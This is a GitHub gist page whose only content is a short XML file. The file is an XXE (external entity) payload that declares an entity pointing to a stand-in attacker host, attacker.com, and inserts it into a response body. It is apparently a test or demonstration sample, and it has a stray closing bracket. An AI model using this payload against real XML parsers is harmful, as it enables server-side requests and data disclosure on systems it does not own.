Skip to content

Instantly share code, notes, and snippets.

@marianogonzalez

marianogonzalez/gist:96d8e9ad6267471d634c

Last active August 29, 2015 14:04
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save marianogonzalez/96d8e9ad6267471d634c to your computer and use it in GitHub Desktop.
Save marianogonzalez/96d8e9ad6267471d634c to your computer and use it in GitHub Desktop.
Download ZIP
Raw
gistfile1.xml
<?xml version="1.0"?>
<!DOCTYPE results [
<!ENTITY xxe SYSTEM "http://www.attacker.com/fake.xml" >]>
]>
<response>
<data>
&xxe;
</data>
</response>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment